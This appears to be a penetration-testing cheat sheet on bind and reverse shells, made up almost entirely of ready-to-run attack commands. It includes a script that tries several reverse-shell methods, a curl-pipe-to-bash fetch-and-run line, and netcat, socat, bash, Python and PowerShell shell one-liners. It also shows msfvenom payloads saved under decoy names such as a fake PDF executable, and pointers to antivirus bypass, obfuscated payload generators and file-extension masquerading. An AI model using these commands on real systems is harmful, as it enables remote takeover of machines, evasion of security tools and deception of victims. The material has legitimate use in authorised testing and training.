# Bind and Reverse Shell ## Tools ### Online {% embed url="" %} ### LazyRevShell {% embed url="" %} LazyShell {% endembed %}

### One-Lin3r {% embed url="" %} One-Lin3r {% endembed %} ``` pip install one-lin3r ```

### FuegoShell {% embed url="" %} ## Web Shells {% content-ref url="web-shell" %} [web-shell](https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/web-shell) {% endcontent-ref %} ## Reverse Shell - Not Web {% embed url="" %} Online - Reverse Shell Generator {% endembed %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ### revshell.sh - Test all methods ```bash #!/bin/bash # Replace with your IP address YOUR_IP="" PORT=2121 # Attempt to use different methods for a reverse shell if command -v bash > /dev/null; then bash -i >& /dev/tcp/$YOUR_IP/$PORT 0>&1 elif command -v nc > /dev/null; then nc $YOUR_IP $PORT -e /bin/bash elif command -v python3 > /dev/null; then python3 -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")" elif command -v python > /dev/null; then python -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")" elif command -v perl > /dev/null; then perl -e "use Socket; \$i=\"$YOUR_IP\"; \$p=$PORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); connect(S,sockaddr_in(\$p,inet_aton(\$i))); open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/bash -i\");" else echo "No suitable reverse shell method found." fi ``` ``` curl http://IP/revshell.sh|bash ``` ### rs-shell - RS in Rust {% embed url="" %} Rust RS {% endembed %} ### Secure Reverse Shell Reverse shell tool that uses AES-GCM (256-bit) encryption and ECDH (Curve P-256) to ensure encrypted and protected communication {% embed url="" %} ### FullBypass Bypass AMSI {% embed url="" %} ### rcat {% embed url="" %} ### RevShellGenerator A **polymorphic PowerShell reverse shell generator** that produces a unique, heavily obfuscated payload on every run — no two outputs look alike. {% embed url="" %} ### PowerJoker - Powershell Reverse Shell - Bypass Defender {% embed url="" %} ### Over UDP {% embed url="" %} ### Attack Host `nc -nlvp 1234` ### Netcat - Victim ``` # Attacker nc -nlvp [PORT] # Victim ## Windows nc.exe [IP] [PORT] -e cmd.exe ## Linux nc [IP] [PORT] -e /bin/bash ## if -e option doesn't work mkfifo /tmp/f; nc < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f ``` #### Netcat traditional ``` # Attacker nc -nlvp [PORT] # Victim nc.traditional -e/bin/sh [IP] [PORT] ``` ### Socat - Victim ``` # Attacker socat TCP-L: - # Victim ## Windows socat TCP:: EXEC:powershell.exe,pipes ## Linux socat TCP:: EXEC:"bash -li" ###################### # Attacker socat TCP-L: FILE:`tty`,raw,echo=0 # Victim socat TCP:: EXEC:"bash -li",pty,stderr,sigint,setsid,sane ``` #### Encrypted ``` # 1 - Generate a certificate openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt # 2 - merge the two created files into a single .pem cat shell.key shell.crt > shell.pem #### REVERSE SHELL #### # 3 - Reverse shell listener socat OPENSSL-LISTEN:,cert=shell.pem,verify=0 - # 4 - Connect back socat OPENSSL::,verify=0 EXEC:/bin/bash ``` ### Bash - Victim ``` bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' bash -c 'sh -i >& /dev/tcp/10.10.14.44/4444 0>&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f bash -i >& /dev/tcp// 0>&1 exec 5<>/dev/tcp//;cat <&5 | while read line; do $line 2>&5 >&5; done exec /bin/sh 0/ 1>&0 2>&0 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 ``` ### Python - Victim ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ### Powershell - Victim {% hint style="success" %} *Also Check* [*PowerJocker*](#powerjoker-powershell-reverse-shell-bypass-defender) *and* [*FuegoShell*](#fuegoshell) {% endhint %} ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()" ``` If: ```cmd-session At line:1 char:1 + $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent ``` \=> Disable AV {% content-ref url="../internal-pentest/disable-remove-av-defender-and-firewall" %} [disable-remove-av-defender-and-firewall](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/disable-remove-av-defender-and-firewall) {% endcontent-ref %} #### Invoke-PowershellTcp.ps1 {% embed url="" %} `PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444` ### DLL {% embed url="" %} ### MSFVenom {% embed url="" %} ``` msfvenom -p Ex: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST= LPORT= msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi Payload naming convention: // Ex: linux/x86/shell_reverse_tcp msfvenom --list payloads | grep "linux/x86/meterpreter" Listener: msfconsole use multi/handler ``` #### Linux ```shell-session $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes ``` #### Windows ```shell-session msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes ``` ```shell-session $ msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 712 bytes Final size of exe file: 7168 bytes Saved as: backupscript.exe ``` ```shell-session msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0 msf6 exploit(multi/handler) > set lport 8000 lport => 8000 msf6 exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://0.0.0.0:8000 ``` Cheatsheet: {% embed url="" %} More on: {% content-ref url="../tools/metasploit" %} [metasploit](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/metasploit) {% endcontent-ref %} #### Bypass AV / EDR {% embed url="" %} ### Curl {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Bind Shell - Not Web {% embed url="" %} ### Netcat -Victim ```shell-session nc -lvnp 7777 ``` ``` # Victim ## Linux nc -vlp [PORT] -e /bin/bash ## Windows nc.exe -nlvp [PORT] -e cmd.exe ## if -e option doesn't work mkfifo /tmp/f; nc -lvnp < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f # Attacker nc [IP] [PORT] #### BIND SHELL #### copy the PEM file on target # 3 - Target socat OPENSSL-LISTEN:,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes # 4 - Attacker socat OPENSSL::,verify=0 - ``` #### Encrypted shell ``` # 1 - Generate a certificate openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt # 2 - merge the two created files into a single .pem cat shell.key shell.crt > shell.pem ``` ### Socat - Vicitim ``` # Victim ## Windows socat TCP-L: EXEC:powershell.exe,pipes ## Linux socat TCP-L: EXEC:"bash -li" # Attacker socat TCP:: - ``` ### Bash - Victim ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f ``` ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f ``` #### **Debugging** ``` htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f nc: getnameinfo: Temporary failure in name resolution htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 10.129.201.134 1234 >/tmp/f usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl] [-m minttl] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port] htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f ``` ### Python - Victim ```python python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' ``` ### Powershell - Vicitm ```powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(); ``` #### Invoke-PowershellTcp.ps1 {% embed url="" %} `PS > Invoke-PowerShellTcp -Bind -Port 4444` ### Attack Host ```shell-session nc -nv 10.129.41.200 7777 ``` ## Right to left override - Masquerading {% embed url="" %} Takes a file (usually executable) and appends a Unicode right to left override character to disguise the real file extension {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Shell inside a PNG {% embed url="" %} ## TTY upgrade {% content-ref url="tty-upgrade" %} [tty-upgrade](https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/tty-upgrade) {% endcontent-ref %} ## Resources {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)